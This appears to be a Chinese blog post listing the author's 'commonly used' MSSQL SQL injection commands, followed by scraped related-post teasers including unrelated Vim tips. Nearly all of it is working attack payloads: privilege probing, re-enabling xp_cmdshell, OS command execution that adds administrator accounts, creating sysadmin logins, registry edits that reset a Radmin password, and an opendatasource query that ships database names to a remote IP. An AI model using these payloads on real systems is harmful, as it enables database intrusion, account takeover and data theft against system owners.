//看看是什麼許可權的
and 1=(select is_member('db_owner'))
and char(124)%2bcast(is_member('db_owner') as varchar(1))%2bchar(124)=1 ;--
//檢測是否有讀取某資料庫的許可權
and 1= (select has_dbaccess('master'))
and char(124)%2bcast(has_dbaccess('master') as varchar(1))%2bchar(124)=1 --
數字型別
and char(124)%2buser%2bchar(124)=0
字元型別
' and char(124)%2buser%2bchar(124)=0 and ''='
搜尋型別
' and char(124)%2buser%2bchar(124)=0 and '%'='
爆使用者名稱
and user>0
' and user>0 and ''='
檢測是否為sa許可權
and 1=(select is_srvrolemember('sysadmin'));--
and char(124)%2bcast(is_srvrolemember(0x730079007300610064006d0069006e00) as varchar(1))%2bchar(124)=1 --
檢測是不是mssql資料庫
and exists (select * from sysobjects);--
檢測是否支援多行
;declare @d int;--
恢復 xp_cmdshell
;exec master..dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll';--
select * from openrowset('sqloledb','server=192.168.1.200,1433;uid=test;pwd=pafpaf','select @@version')
//-----------------------
// 執行命令
//-----------------------
首先開啟沙盤模式:
exec master..xp_regwrite 'hkey_local_machine','software/microsoft/jet/4.0/engines','sandboxmode','reg_dword',1
然後利用jet.oledb執行系統命令
select * from openrowset('microsoft.jet.oledb.4.0',';database=c:/winnt/system32/ias/ias.mdb','select shell("cmd.exe /c net user admin admin1234 /add")')
執行命令
;declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null, 'c:/winnt/system32/cmd.exe /c net user paf pafpaf /add';--
exec [master].[dbo].[xp_cmdshell] 'cmd /c md c:/1111'
判斷xp_cmdshell擴充套件儲存過程是否存在:
寫登錄檔
exec master..xp_regwrite 'hkey_local_machine','software/microsoft/jet/4.0/engines','sandboxmode','reg_dword',1
reg_sz
讀登錄檔
exec master..xp_regread 'hkey_local_machine','software/microsoft/windows nt/currentversion/winlogon','userinit'
讀取目錄內容
exec master..xp_dirtree 'c:/winnt/system32/',1,1
資料庫備份
backup database pubs to disk = 'c:/123.bak'
//爆出長度
and (select char(124)%2bcast(count(1) as varchar(8000))%2bchar(124) from d99_tmp)=0 ;--
更改sa口令方法:用sql綜合利用工具連線後,執行命令:
exec sp_password null,'新密碼','sa'
新增和刪除乙個sa許可權的使用者test:
exec master.dbo.sp_addlogin test,ptlove
exec master.dbo.sp_addsrvrolemember test,sysadmin
刪除擴充套件儲存過過程xp_cmdshell的語句:
exec sp_dropextendedproc 'xp_cmdshell'
新增擴充套件儲存過過程
exec [master]..sp_addextendedproc 'xp_proxiedadata', 'c:/winnt/system32/sqllog.dll'
grant exec on xp_proxiedadata to public
停掉或啟用某個服務。
exec master..xp_servicecontrol 'stop','schedule'
exec master..xp_servicecontrol 'start','schedule'
dbo.xp_subdirs
只列某個目錄下的子目錄。
xp_getfiledetails 'c:/inetpub/wwwroot/sqlinject/login.asp'
dbo.xp_makecab
將目標多個檔案壓縮到某個目標檔案之內。
所有要壓縮的檔案都可以接在引數列的最後方,以逗號隔開。
dbo.xp_makecab
'c:/test.cab','mszip',1,
'c:/inetpub/wwwroot/sqlinject/login.asp',
'c:/inetpub/wwwroot/sqlinject/securelogin.asp'
xp_terminate_process
停掉某個執行中的程式,但賦予的引數是 process id。
利用」任務管理器」,透過選單「檢視」-「選擇字段」勾選 pid,就可以看到每個執行程式的 process id
xp_terminate_process 2484
xp_unpackcab
解開壓縮檔。
xp_unpackcab 'c:/test.cab','c:/temp',1
某機,安裝了radmin,密碼被修改了,regedit.exe不知道被刪除了還是被改名了,net.exe不存在,沒有辦法使用regedit /e 匯入註冊檔案,但是mssql是sa許可權,使用如下命令 exec master.dbo.xp_regwrite 'hkey_local_machine','system/radmin/v2.0/server/parameters','parameter','reg_binary',0x02ba5e187e2589be6f80da0046aa7e3c 即可修改密碼為12345678。如果要修改埠值 exec master.dbo.xp_regwrite 'hkey_local_machine','system/radmin/v2.0/server/parameters','port','reg_binary',0xd20400 則埠值改為1234
create database lcx;
create table ku(name nvarchar(256) null);
create table biao(id int null,name nvarchar(256) null);
//得到資料庫名
insert into opendatasource('sqloledb','server=211.39.145.163,1443;uid=test;pwd=pafpaf;database=lcx').lcx.dbo.ku select name from master.dbo.sysdatabases
//在master中建立表,看看許可權怎樣
create table master..d_test(id nvarchar(4000) null,data nvarchar(4000) null);--
用 sp_makewebtask直接在web目錄裡寫入一句話馬:
//更新表內容
update films set kind = 'dramatic' where id = 123
//刪除內容
delete from table_name where stockid = 3
我常用的一些注入命令,方便一下大家
我記性不好,所以把常用的注入 記錄下來,有點亂,但對我來說,還算很有用,希望大家也會喜歡!看看是什麼許可權的 and 1 select is member db owner and char 124 2bcast is member db owner as varchar 1 2bchar 124 ...
我常用的一些注入命令,方便一下大家
我記性不好,所以把常用的注入 記錄下來,有點亂,但對我來說,還算很有用,希望大家也會喜歡!看看是什麼許可權的 and1 selectis member db owner andchar 124 2bcast is member db owner asvarchar 1 2bchar 124 1 檢測...
Vim的一些常用方便命令
一 撤銷和重做 按 u 可以撤銷,有時候會不小心撤銷過頭,一直不知道重做的快捷鍵,很頭大,其實按 ctrl r 即可 二 單詞移動和刪除 按 w b 可以按照單詞前後移動,同理,dw db 是前後刪除單詞 de不會刪除單詞後的空格,dw會 三 同時編輯多個檔案 vsp,開啟乙個垂直的新編輯介面 sp...